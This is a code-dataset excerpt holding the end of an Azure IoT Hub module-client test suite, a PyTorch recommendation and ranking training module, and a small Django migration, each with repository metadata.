tests in order to accomodate unique requirements for the .create_from_edge_enviornment() method.
Because .create_from_edge_environment() tests are spread accross multiple test units
(i.e. test classes), these overrides are done in this class, which is then inherited by all
.create_from_edge_environment() test units below.
"""
@pytest.fixture
def client_create_method(self, client_class):
"""Provides the specific create method for use in universal tests"""
return client_class.create_from_edge_environment
@pytest.fixture
def create_method_args(self):
"""Provides the specific create method args for use in universal tests"""
return []
@pytest.mark.it(
"Raises a TypeError if the 'server_verification_cert' user option parameter is provided"
)
def test_server_verification_cert_option(
self,
option_test_required_patching,
client_create_method,
create_method_args,
mock_mqtt_pipeline_init,
mock_http_pipeline_init,
):
"""THIS TEST OVERRIDES AN INHERITED TEST"""
# Override to test that server_verification_cert CANNOT be provided in Edge scenarios
with pytest.raises(TypeError):
client_create_method(
*create_method_args, server_verification_cert="fake_server_verification_cert"
)
@pytest.mark.it("Sets default user options if none are provided")
def test_default_options(
self,
mocker,
option_test_required_patching,
client_create_method,
create_method_args,
mock_mqtt_pipeline_init,
mock_http_pipeline_init,
):
"""THIS TEST OVERRIDES AN INHERITED TEST"""
        # Override so that we can avoid the check on server_verification_cert being None,
        # as in Edge scenarios it is not None
client_create_method(*create_method_args)
# Both pipelines use the same IoTHubPipelineConfig
assert mock_mqtt_pipeline_init.call_count == 1
assert mock_http_pipeline_init.call_count == 1
assert mock_mqtt_pipeline_init.call_args[0][0] is mock_http_pipeline_init.call_args[0][0]
config = mock_mqtt_pipeline_init.call_args[0][0]
assert isinstance(config, IoTHubPipelineConfig)
# Pipeline Config has default options that were not specified
assert config.product_info == ""
assert config.websockets is False
assert config.cipher == ""
assert config.proxy_options is None
assert config.keep_alive == DEFAULT_KEEPALIVE
@pytest.mark.usefixtures("mock_mqtt_pipeline_init", "mock_http_pipeline_init")
class SharedIoTHubModuleClientCreateFromEdgeEnvironmentWithContainerEnvTests(
SharedIoTHubModuleClientClientCreateFromEdgeEnvironmentUserOptionTests
):
@pytest.fixture
def option_test_required_patching(self, mocker, mock_edge_hsm, edge_container_environment):
"""THIS FIXTURE OVERRIDES AN INHERITED FIXTURE"""
mocker.patch.dict(os.environ, edge_container_environment, clear=True)
@pytest.mark.it(
"Creates a SasToken that uses an IoTEdgeHsm, from the values extracted from the Edge environment and the user-provided TTL"
)
def test_sastoken(self, mocker, client_class, mock_edge_hsm, edge_container_environment):
mocker.patch.dict(os.environ, edge_container_environment, clear=True)
sastoken_mock = mocker.patch.object(st, "RenewableSasToken")
expected_uri = "{hostname}/devices/{device_id}/modules/{module_id}".format(
hostname=edge_container_environment["IOTEDGE_IOTHUBHOSTNAME"],
device_id=edge_container_environment["IOTEDGE_DEVICEID"],
module_id=edge_container_environment["IOTEDGE_MODULEID"],
)
custom_ttl = 1000
client_class.create_from_edge_environment(sastoken_ttl=custom_ttl)
# IoTEdgeHsm created using the extracted values
assert mock_edge_hsm.call_count == 1
assert mock_edge_hsm.call_args == mocker.call(
module_id=edge_container_environment["IOTEDGE_MODULEID"],
generation_id=edge_container_environment["IOTEDGE_MODULEGENERATIONID"],
workload_uri=edge_container_environment["IOTEDGE_WORKLOADURI"],
api_version=edge_container_environment["IOTEDGE_APIVERSION"],
)
# SasToken created with the IoTEdgeHsm, the expected URI and the custom ttl
assert sastoken_mock.call_count == 1
assert sastoken_mock.call_args == mocker.call(
expected_uri, mock_edge_hsm.return_value, ttl=custom_ttl
)
@pytest.mark.it(
"Uses 3600 seconds (1 hour) as the default SasToken TTL if no custom TTL is provided"
)
def test_sastoken_default(
self, mocker, client_class, mock_edge_hsm, edge_container_environment
):
mocker.patch.dict(os.environ, edge_container_environment, clear=True)
sastoken_mock = mocker.patch.object(st, "RenewableSasToken")
expected_uri = "{hostname}/devices/{device_id}/modules/{module_id}".format(
hostname=edge_container_environment["IOTEDGE_IOTHUBHOSTNAME"],
device_id=edge_container_environment["IOTEDGE_DEVICEID"],
module_id=edge_container_environment["IOTEDGE_MODULEID"],
)
client_class.create_from_edge_environment()
# IoTEdgeHsm created using the extracted values
assert mock_edge_hsm.call_count == 1
assert mock_edge_hsm.call_args == mocker.call(
module_id=edge_container_environment["IOTEDGE_MODULEID"],
generation_id=edge_container_environment["IOTEDGE_MODULEGENERATIONID"],
workload_uri=edge_container_environment["IOTEDGE_WORKLOADURI"],
api_version=edge_container_environment["IOTEDGE_APIVERSION"],
)
# SasToken created with the IoTEdgeHsm, the expected URI, and the default ttl
assert sastoken_mock.call_count == 1
assert sastoken_mock.call_args == mocker.call(
expected_uri, mock_edge_hsm.return_value, ttl=3600
)
@pytest.mark.it(
"Uses an IoTEdgeHsm as the SasToken signing mechanism even if any Edge local debug environment variables may also be present"
)
def test_hybrid_env(
self,
mocker,
client_class,
mock_edge_hsm,
edge_container_environment,
edge_local_debug_environment,
):
hybrid_environment = merge_dicts(edge_container_environment, edge_local_debug_environment)
mocker.patch.dict(os.environ, hybrid_environment, clear=True)
sastoken_mock = mocker.patch.object(st, "RenewableSasToken")
mock_sksm = mocker.patch.object(auth, "SymmetricKeySigningMechanism")
client_class.create_from_edge_environment()
assert mock_sksm.call_count == 0 # we did NOT use SK signing mechanism
assert mock_edge_hsm.call_count == 1 # instead, we still used edge hsm
assert mock_edge_hsm.call_args == mocker.call(
module_id=edge_container_environment["IOTEDGE_MODULEID"],
generation_id=edge_container_environment["IOTEDGE_MODULEGENERATIONID"],
workload_uri=edge_container_environment["IOTEDGE_WORKLOADURI"],
api_version=edge_container_environment["IOTEDGE_APIVERSION"],
)
assert sastoken_mock.call_count == 1
assert sastoken_mock.call_args == mocker.call(
mocker.ANY, mock_edge_hsm.return_value, ttl=3600
)
@pytest.mark.it(
"Creates MQTT and HTTP pipelines with an IoTHubPipelineConfig object containing the SasToken and values extracted from the Edge environment"
)
def test_pipeline_config(
self,
mocker,
client_class,
mock_edge_hsm,
edge_container_environment,
mock_mqtt_pipeline_init,
mock_http_pipeline_init,
):
mocker.patch.dict(os.environ, edge_container_environment, clear=True)
sastoken_mock = mocker.patch.object(st, "RenewableSasToken")
client_class.create_from_edge_environment()
# Verify pipelines created with an IoTHubPipelineConfig
assert mock_mqtt_pipeline_init.call_count == 1
assert mock_http_pipeline_init.call_count == 1
assert mock_mqtt_pipeline_init.call_args[0][0] is mock_http_pipeline_init.call_args[0][0]
assert isinstance(mock_mqtt_pipeline_init.call_args[0][0], IoTHubPipelineConfig)
# Verify the IoTHubPipelineConfig is constructed as expected
config = mock_mqtt_pipeline_init.call_args[0][0]
assert config.device_id == edge_container_environment["IOTEDGE_DEVICEID"]
assert config.module_id == edge_container_environment["IOTEDGE_MODULEID"]
assert config.hostname == edge_container_environment["IOTEDGE_IOTHUBHOSTNAME"]
assert config.gateway_hostname == edge_container_environment["IOTEDGE_GATEWAYHOSTNAME"]
assert config.sastoken is sastoken_mock.return_value
assert (
config.server_verification_cert
== mock_edge_hsm.return_value.get_certificate.return_value
)
assert config.method_invoke is True
assert config.blob_upload is False
@pytest.mark.it(
"Returns an instance of an IoTHubModuleClient using the created MQTT and HTTP pipelines"
)
def test_client_returns(
self,
mocker,
client_class,
mock_edge_hsm,
edge_container_environment,
mock_mqtt_pipeline_init,
mock_http_pipeline_init,
):
mocker.patch.dict(os.environ, edge_container_environment, clear=True)
client = client_class.create_from_edge_environment()
assert isinstance(client, client_class)
assert client._mqtt_pipeline is mock_mqtt_pipeline_init.return_value
assert client._http_pipeline is mock_http_pipeline_init.return_value
@pytest.mark.it("Raises OSError if the environment is missing required variables")
@pytest.mark.parametrize(
"missing_env_var",
[
"IOTEDGE_MODULEID",
"IOTEDGE_DEVICEID",
"IOTEDGE_IOTHUBHOSTNAME",
"IOTEDGE_GATEWAYHOSTNAME",
"IOTEDGE_APIVERSION",
"IOTEDGE_MODULEGENERATIONID",
"IOTEDGE_WORKLOADURI",
],
)
def test_bad_environment(
self, mocker, client_class, edge_container_environment, missing_env_var
):
# Remove a variable from the fixture
del edge_container_environment[missing_env_var]
mocker.patch.dict(os.environ, edge_container_environment, clear=True)
with pytest.raises(OSError):
client_class.create_from_edge_environment()
@pytest.mark.it(
"Raises OSError if there is an error retrieving the server verification certificate from Edge with the IoTEdgeHsm"
)
def test_bad_edge_auth(self, mocker, client_class, edge_container_environment, mock_edge_hsm):
mocker.patch.dict(os.environ, edge_container_environment, clear=True)
my_edge_error = edge_hsm.IoTEdgeError()
mock_edge_hsm.return_value.get_certificate.side_effect = my_edge_error
with pytest.raises(OSError) as e_info:
client_class.create_from_edge_environment()
assert e_info.value.__cause__ is my_edge_error
@pytest.mark.it("Raises ValueError if a SasToken creation results in failure")
def test_raises_value_error_on_sastoken_failure(
self, mocker, client_class, edge_container_environment, mock_edge_hsm
):
mocker.patch.dict(os.environ, edge_container_environment, clear=True)
sastoken_mock = mocker.patch.object(st, "RenewableSasToken")
token_err = st.SasTokenError("Some SasToken failure")
sastoken_mock.side_effect = token_err
with pytest.raises(ValueError) as e_info:
client_class.create_from_edge_environment()
assert e_info.value.__cause__ is token_err
@pytest.mark.usefixtures("mock_mqtt_pipeline_init", "mock_http_pipeline_init")
class SharedIoTHubModuleClientCreateFromEdgeEnvironmentWithDebugEnvTests(
SharedIoTHubModuleClientClientCreateFromEdgeEnvironmentUserOptionTests
):
@pytest.fixture
def option_test_required_patching(self, mocker, mock_open, edge_local_debug_environment):
"""THIS FIXTURE OVERRIDES AN INHERITED FIXTURE"""
mocker.patch.dict(os.environ, edge_local_debug_environment, clear=True)
@pytest.fixture
def mock_open(self, mocker):
return mocker.patch.object(io, "open")
@pytest.mark.it(
"Creates a SasToken that uses a SymmetricKeySigningMechanism, from the values in the connection string extracted from the Edge local debug environment, as well as the user-provided TTL"
)
def test_sastoken(self, mocker, client_class, mock_open, edge_local_debug_environment):
mocker.patch.dict(os.environ, edge_local_debug_environment, clear=True)
sksm_mock = mocker.patch.object(auth, "SymmetricKeySigningMechanism")
sastoken_mock = mocker.patch.object(st, "RenewableSasToken")
cs_obj = cs.ConnectionString(edge_local_debug_environment["EdgeHubConnectionString"])
expected_uri = "{hostname}/devices/{device_id}/modules/{module_id}".format(
hostname=cs_obj[cs.HOST_NAME],
device_id=cs_obj[cs.DEVICE_ID],
module_id=cs_obj[cs.MODULE_ID],
)
custom_ttl = 1000
client_class.create_from_edge_environment(sastoken_ttl=custom_ttl)
# SymmetricKeySigningMechanism created using the connection string's Shared Access Key
assert sksm_mock.call_count == 1
assert sksm_mock.call_args == mocker.call(key=cs_obj[cs.SHARED_ACCESS_KEY])
# SasToken created with the SymmetricKeySigningMechanism, the expected URI, and the custom ttl
assert sastoken_mock.call_count == 1
assert sastoken_mock.call_args == mocker.call(
expected_uri, sksm_mock.return_value, ttl=custom_ttl
)
@pytest.mark.it(
"Uses 3600 seconds (1 hour) as the default SasToken TTL if no custom TTL is provided"
)
def test_sastoken_default(self, mocker, client_class, mock_open, edge_local_debug_environment):
mocker.patch.dict(os.environ, edge_local_debug_environment, clear=True)
sksm_mock = mocker.patch.object(auth, "SymmetricKeySigningMechanism")
sastoken_mock = mocker.patch.object(st, "RenewableSasToken")
cs_obj = cs.ConnectionString(edge_local_debug_environment["EdgeHubConnectionString"])
expected_uri = "{hostname}/devices/{device_id}/modules/{module_id}".format(
hostname=cs_obj[cs.HOST_NAME],
device_id=cs_obj[cs.DEVICE_ID],
module_id=cs_obj[cs.MODULE_ID],
)
client_class.create_from_edge_environment()
# SymmetricKeySigningMechanism created using the connection string's Shared Access Key
assert sksm_mock.call_count == 1
assert sksm_mock.call_args == mocker.call(key=cs_obj[cs.SHARED_ACCESS_KEY])
# SasToken created with the SymmetricKeySigningMechanism, the expected URI and default ttl
assert sastoken_mock.call_count == 1
assert sastoken_mock.call_args == mocker.call(
expected_uri, sksm_mock.return_value, ttl=3600
)
@pytest.mark.it(
"Only uses Edge local debug variables if no Edge container variables are present in the environment"
)
def test_auth_provider_and_pipeline_hybrid_env(
self,
mocker,
client_class,
edge_container_environment,
edge_local_debug_environment,
mock_open,
mock_edge_hsm,
):
# This test verifies that the presence of edge container environment variables means the
# code will follow the edge container environment creation path (using the IoTEdgeHsm)
# even if edge local debug variables are present.
hybrid_environment = merge_dicts(edge_container_environment, edge_local_debug_environment)
mocker.patch.dict(os.environ, hybrid_environment, clear=True)
sastoken_mock = mocker.patch.object(st, "RenewableSasToken")
sksm_mock = mocker.patch.object(auth, "SymmetricKeySigningMechanism")
client_class.create_from_edge_environment()
assert sksm_mock.call_count == 0 # we did NOT use SK signing mechanism
assert mock_edge_hsm.call_count == 1 # instead, we still used edge HSM
assert mock_edge_hsm.call_args == mocker.call(
module_id=edge_container_environment["IOTEDGE_MODULEID"],
generation_id=edge_container_environment["IOTEDGE_MODULEGENERATIONID"],
workload_uri=edge_container_environment["IOTEDGE_WORKLOADURI"],
api_version=edge_container_environment["IOTEDGE_APIVERSION"],
)
assert sastoken_mock.call_count == 1
assert sastoken_mock.call_args == mocker.call(
mocker.ANY, mock_edge_hsm.return_value, ttl=3600
)
@pytest.mark.it(
"Extracts the server verification certificate from the file indicated by the filepath extracted from the Edge local debug environment"
)
def test_open_ca_cert(self, mocker, client_class, edge_local_debug_environment, mock_open):
mock_file_handle = mock_open.return_value.__enter__.return_value
mocker.patch.dict(os.environ, edge_local_debug_environment, clear=True)
client_class.create_from_edge_environment()
assert mock_open.call_count == 1
assert mock_open.call_args == mocker.call(
edge_local_debug_environment["EdgeModuleCACertificateFile"], mode="r"
)
assert mock_file_handle.read.call_count == 1
assert mock_file_handle.read.call_args == mocker.call()
@pytest.mark.it(
"Creates MQTT and HTTP pipelines with an IoTHubPipelineConfig object containing the SasToken and values extracted from the Edge local debug environment"
)
def test_pipeline_config(
self,
mocker,
client_class,
mock_open,
edge_local_debug_environment,
mock_mqtt_pipeline_init,
mock_http_pipeline_init,
):
mocker.patch.dict(os.environ, edge_local_debug_environment, clear=True)
sastoken_mock = mocker.patch.object(st, "RenewableSasToken")
mock_file_handle = mock_open.return_value.__enter__.return_value
ca_cert_file_contents = "some cert"
mock_file_handle.read.return_value = ca_cert_file_contents
cs_obj = cs.ConnectionString(edge_local_debug_environment["EdgeHubConnectionString"])
client_class.create_from_edge_environment()
# Verify pipelines created with an IoTHubPipelineConfig
assert mock_mqtt_pipeline_init.call_count == 1
assert mock_http_pipeline_init.call_count == 1
assert mock_mqtt_pipeline_init.call_args[0][0] is mock_http_pipeline_init.call_args[0][0]
assert isinstance(mock_mqtt_pipeline_init.call_args[0][0], IoTHubPipelineConfig)
        # Verify the IoTHubPipelineConfig is constructed as expected
config = mock_mqtt_pipeline_init.call_args[0][0]
assert config.device_id == cs_obj[cs.DEVICE_ID]
assert config.module_id == cs_obj[cs.MODULE_ID]
assert config.hostname == cs_obj[cs.HOST_NAME]
assert config.gateway_hostname == cs_obj[cs.GATEWAY_HOST_NAME]
assert config.sastoken is sastoken_mock.return_value
assert config.server_verification_cert == ca_cert_file_contents
assert config.method_invoke is True
assert config.blob_upload is False
@pytest.mark.it(
"Returns an instance of an IoTHub client using the created MQTT and HTTP pipelines"
)
def test_client_returned(
self,
mocker,
client_class,
mock_open,
edge_local_debug_environment,
mock_mqtt_pipeline_init,
mock_http_pipeline_init,
):
mocker.patch.dict(os.environ, edge_local_debug_environment, clear=True)
client = client_class.create_from_edge_environment()
assert isinstance(client, client_class)
assert client._mqtt_pipeline is mock_mqtt_pipeline_init.return_value
assert client._http_pipeline is mock_http_pipeline_init.return_value
@pytest.mark.it("Raises OSError if the environment is missing required variables")
@pytest.mark.parametrize(
"missing_env_var", ["EdgeHubConnectionString", "EdgeModuleCACertificateFile"]
)
def test_bad_environment(
self, mocker, client_class, edge_local_debug_environment, missing_env_var, mock_open
):
# Remove a variable from the fixture
del edge_local_debug_environment[missing_env_var]
mocker.patch.dict(os.environ, edge_local_debug_environment, clear=True)
with pytest.raises(OSError):
client_class.create_from_edge_environment()
@pytest.mark.it(
"Raises ValueError if the connection string in the EdgeHubConnectionString environment variable is invalid"
)
@pytest.mark.parametrize(
"bad_cs",
[
pytest.param("not-a-connection-string", id="Garbage string"),
pytest.param(
"HostName=value.domain.net;DeviceId=my_device;ModuleId=my_module;SharedAccessKey=Invalid",
id="Shared Access Key invalid",
),
pytest.param(
"HostName=value.domain.net;WrongValue=Invalid;SharedAccessKey=Zm9vYmFy",
id="Contains extraneous data",
),
pytest.param("HostName=value.domain.net;DeviceId=my_device", id="Incomplete"),
],
)
def test_bad_connection_string(
self, mocker, client_class, edge_local_debug_environment, bad_cs, mock_open
):
edge_local_debug_environment["EdgeHubConnectionString"] = bad_cs
mocker.patch.dict(os.environ, edge_local_debug_environment, clear=True)
with pytest.raises(ValueError):
client_class.create_from_edge_environment()
@pytest.mark.it(
"Raises ValueError if the filepath in the EdgeModuleCACertificateFile environment variable is invalid"
)
def test_bad_filepath(self, mocker, client_class, edge_local_debug_environment, mock_open):
        # To make tests compatible with Python 2 & 3, redefine errors
try:
FileNotFoundError # noqa: F823
except NameError:
FileNotFoundError = IOError
mocker.patch.dict(os.environ, edge_local_debug_environment, clear=True)
my_fnf_error = FileNotFoundError()
mock_open.side_effect = my_fnf_error
with pytest.raises(ValueError) as e_info:
client_class.create_from_edge_environment()
assert e_info.value.__cause__ is my_fnf_error
@pytest.mark.it(
"Raises ValueError if the file referenced by the filepath in the EdgeModuleCACertificateFile environment variable cannot be opened"
)
def test_bad_file_io(self, mocker, client_class, edge_local_debug_environment, mock_open):
# Raise a different error in Python 2 vs 3
if six.PY2:
error = IOError()
else:
error = OSError()
mocker.patch.dict(os.environ, edge_local_debug_environment, clear=True)
mock_open.side_effect = error
with pytest.raises(ValueError) as e_info:
client_class.create_from_edge_environment()
assert e_info.value.__cause__ is error
@pytest.mark.it("Raises ValueError if a SasToken creation results in failure")
def test_raises_value_error_on_sastoken_failure(
self, mocker, client_class, edge_local_debug_environment, mock_open
):
mocker.patch.dict(os.environ, edge_local_debug_environment, clear=True)
sastoken_mock = mocker.patch.object(st, "RenewableSasToken")
token_err = st.SasTokenError("Some SasToken failure")
sastoken_mock.side_effect = token_err
with pytest.raises(ValueError) as e_info:
client_class.create_from_edge_environment()
assert e_info.value.__cause__ is token_err
####################
# HELPER FUNCTIONS #
####################
def merge_dicts(d1, d2):
d3 = d1.copy()
d3.update(d2)
return d3
| 43.718088
| 193
| 0.710099
|
8ffbb2fa1497afc4bb951b792bf7223c9a8ccaa2
| 5,939
|
py
|
Python
|
training_pipelines.py
|
FreedomSlow/Recommendation-Systems
|
9799ce1ef8c5a5dc89fb2059c081065c87b4f294
|
[
"Apache-2.0"
] | null | null | null |
training_pipelines.py
|
FreedomSlow/Recommendation-Systems
|
9799ce1ef8c5a5dc89fb2059c081065c87b4f294
|
[
"Apache-2.0"
] | null | null | null |
training_pipelines.py
|
FreedomSlow/Recommendation-Systems
|
9799ce1ef8c5a5dc89fb2059c081065c87b4f294
|
[
"Apache-2.0"
] | null | null | null |
import torch
from tqdm import tqdm
import utils
from torch.utils.tensorboard import SummaryWriter
import loss_functions
import torchmetrics
def train_recommendation_model(net, train_iter, val_iter, epochs, learning_rate=1e-4, loss=None,
device=None, save_optim=None, scheduler=None, scheduler_conf=None,
use_tensorboard=False, feedback_type=None, **kwargs):
"""
Train simple recommendation model using user-item matrix to predict rating for all unseen items
:param net: Torch model
:param train_iter: Torch train DataLoader with X tensor of (user_id, item_id) and y tensor of their ratings
:param val_iter: Same as train_iter but for validation
:param epochs: Number of epochs
:param learning_rate: Learning rate
:param loss: Loss function
:param device: Device to train model on
:param save_optim: Either to save optimizer state
:param kwargs:
"""
    if use_tensorboard:
        writer = SummaryWriter()
if device is None:
device = utils.try_gpu()
print(f"Training model on: {device}")
net.to(device)
    # For NeuMF-style models with implicit feedback, reduce the validation DataLoader
    # to its last (X, y) batch so it can be unpacked directly in the evaluation step below
    if feedback_type == "implicit":
        for item in val_iter:
            val_iter = item
# Pytorch Embeddings work only with SGD (CPU/GPU), Adagrad (CPU)
optimizer = torch.optim.SGD(net.parameters(), lr=learning_rate)
if scheduler is not None:
if scheduler_conf is None:
_scheduler = scheduler(optimizer)
else:
_scheduler = scheduler(optimizer, **scheduler_conf)
if loss is None:
loss = torch.nn.MSELoss()
for epoch in range(epochs):
# Set gradients to train mode
net.train()
for i, (X, y) in enumerate(tqdm(train_iter)):
optimizer.zero_grad()
X, y = X.to(device), y.to(device)
user_tensor = utils.get_id_from_tensor(X, "user")
item_tensor = utils.get_id_from_tensor(X, "item")
y_pred = torch.flatten(net(user_tensor, item_tensor))
l = loss(y_pred, y)
l.backward()
optimizer.step()
with torch.no_grad():
X_test, y_test = val_iter
X_test, y_test = X_test.to(device), y_test.to(device)
_test_user_tensor = utils.get_id_from_tensor(X_test, "user")
_test_item_tensor = utils.get_id_from_tensor(X_test, "item")
y_test_pred = torch.flatten(net(_test_user_tensor, _test_item_tensor))
test_loss = loss(y_test_pred, y_test)
test_rmse = torchmetrics.functional.mean_squared_error(y_test_pred, y_test, squared=False)
        # Log train and validation metrics to TensorBoard
        if use_tensorboard:
            writer.add_scalar("train_loss", l, epoch)
            writer.add_scalar("test_loss", test_loss, epoch)
            writer.add_scalar("test_RMSE", test_rmse, epoch)
        print(f"epoch: {epoch}", f"train loss: {l:.3f}", f"test loss: {test_loss:.3f} test RMSE: {test_rmse:.3f}")
        # Step the learning-rate scheduler once per epoch, if one was provided
        if scheduler is not None:
            _scheduler.step()
if save_optim is not None:
torch.save(optimizer.state_dict(), save_optim)
return f"Optimizer saved to {save_optim}"
return
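# --- Illustrative sketch (not part of the original module) ---------------------
# A minimal example of the kind of model train_recommendation_model() above expects:
# it must be callable as net(user_tensor, item_tensor) and return one rating per pair.
# The class and names below are hypothetical and added purely for illustration; the
# real models are assumed to live elsewhere in this repository.
class _ExampleMatrixFactorization(torch.nn.Module):
    def __init__(self, n_users, n_items, emb_dim=32):
        super().__init__()
        # One embedding table per entity; a rating is predicted as the dot product
        # of the user and item vectors plus per-user and per-item biases.
        self.user_emb = torch.nn.Embedding(n_users, emb_dim)
        self.item_emb = torch.nn.Embedding(n_items, emb_dim)
        self.user_bias = torch.nn.Embedding(n_users, 1)
        self.item_bias = torch.nn.Embedding(n_items, 1)
    def forward(self, user_ids, item_ids):
        dot = (self.user_emb(user_ids) * self.item_emb(item_ids)).sum(dim=1, keepdim=True)
        return dot + self.user_bias(user_ids) + self.item_bias(item_ids)
# Hypothetical usage sketch (assuming 0-indexed integer ids, float ratings, and a
# val_iter passed as a single (X_val, y_val) tuple so it unpacks in the eval step):
#   net = _ExampleMatrixFactorization(n_users=1000, n_items=500)
#   train_recommendation_model(net, train_loader, (X_val, y_val), epochs=5)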
def train_ranking_model(net, train_iter, test_iter, epochs, learning_rate=1e-4, loss=None,
device=None, save_optim=None, hitrate_k=5, **kwargs):
"""
Train pairwise ranking model using user-item interactions positive examples
and using unobserved items as negative examples.
:param net:
:param train_iter:
:param test_iter:
:param epochs:
:param learning_rate:
:param loss:
:param device:
:param save_optim:
:param kwargs:
:return:
"""
writer = SummaryWriter()
device = utils.try_gpu() if device is None else device
print(f"Training model on: {device}")
net.to(device)
    if loss is None:
        # Pop "margin" so it is not forwarded to the SGD optimizer below; it is kept
        # here for use with a hinge loss implementation that accepts a margin.
        _hinge_margin = kwargs.pop("margin", 1)
        loss = loss_functions.hinge_loss_rec
hitrate = torchmetrics.RetrievalHitRate(k=hitrate_k)
# Pytorch Embeddings work only with SGD (CPU/GPU), Adagrad (CPU)
optimizer = torch.optim.SGD(net.parameters(), lr=learning_rate, **kwargs)
for epoch in range(epochs):
# Set gradients to train mode
net.train()
# One observation (X matrix) in case of pairwise ranking consists of user_id, positive item_id
# And negative item_id
for i, batch in enumerate(tqdm(train_iter)):
optimizer.zero_grad()
user_id, pos_item, neg_item = batch
user_id = user_id.type(torch.IntTensor)
pos_item = pos_item.type(torch.IntTensor)
neg_item = neg_item.type(torch.IntTensor)
y_pred_pos = net(user_id, pos_item)
y_pred_neg = net(user_id, neg_item)
l = loss(y_pred_pos, y_pred_neg)
l.backward()
optimizer.step()
with torch.no_grad():
writer.add_scalar("train_loss", l, epoch)
hit_rate = 0
_cnt = 0
for test_batch in test_iter:
test_user_id, test_item_id, test_target = test_batch
test_user_id = test_user_id.type(torch.LongTensor)
test_item_id = test_item_id.type(torch.IntTensor)
test_target = test_target.type(torch.IntTensor)
test_pred = torch.flatten(net(test_user_id, test_item_id))
hit_rate += hitrate(test_pred, test_target, indexes=test_user_id)
_cnt += 1
hit_rate = hit_rate / _cnt
writer.add_scalar("test_HitRate", hit_rate, epoch)
print(f"epoch: {epoch}", f"train loss: {l:.3f}", f"test loss: {hit_rate:.3f}")
| 35.993939
| 111
| 0.618623
|
ebe647946eebe2329f093676e72fa6b7122b5f8f
| 644
|
py
|
Python
|
hrp/researches/migrations/0016_review_research.py
|
ken-mathenge/health_research_portal
|
e7e5ac8109c002a2d666c27ad076bbe040e00e5f
|
[
"MIT"
] | 1
|
2020-01-21T10:27:35.000Z
|
2020-01-21T10:27:35.000Z
|
hrp/researches/migrations/0016_review_research.py
|
ken-mathenge/health_research_portal
|
e7e5ac8109c002a2d666c27ad076bbe040e00e5f
|
[
"MIT"
] | 13
|
2020-03-23T09:25:15.000Z
|
2020-07-14T12:41:14.000Z
|
hrp/researches/migrations/0016_review_research.py
|
KennethMathenge/health_research_portal
|
e7e5ac8109c002a2d666c27ad076bbe040e00e5f
|
[
"MIT"
] | null | null | null |
# Generated by Django 3.0.3 on 2020-03-17 09:26
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
("researches", "0015_review_reviewchecklist"),
]
operations = [
migrations.AddField(
model_name="review",
name="research",
field=models.ForeignKey(
default=1,
on_delete=django.db.models.deletion.CASCADE,
related_name="research_to_review",
to="researches.Research",
),
preserve_default=False,
),
]
| 24.769231
| 60
| 0.57764
|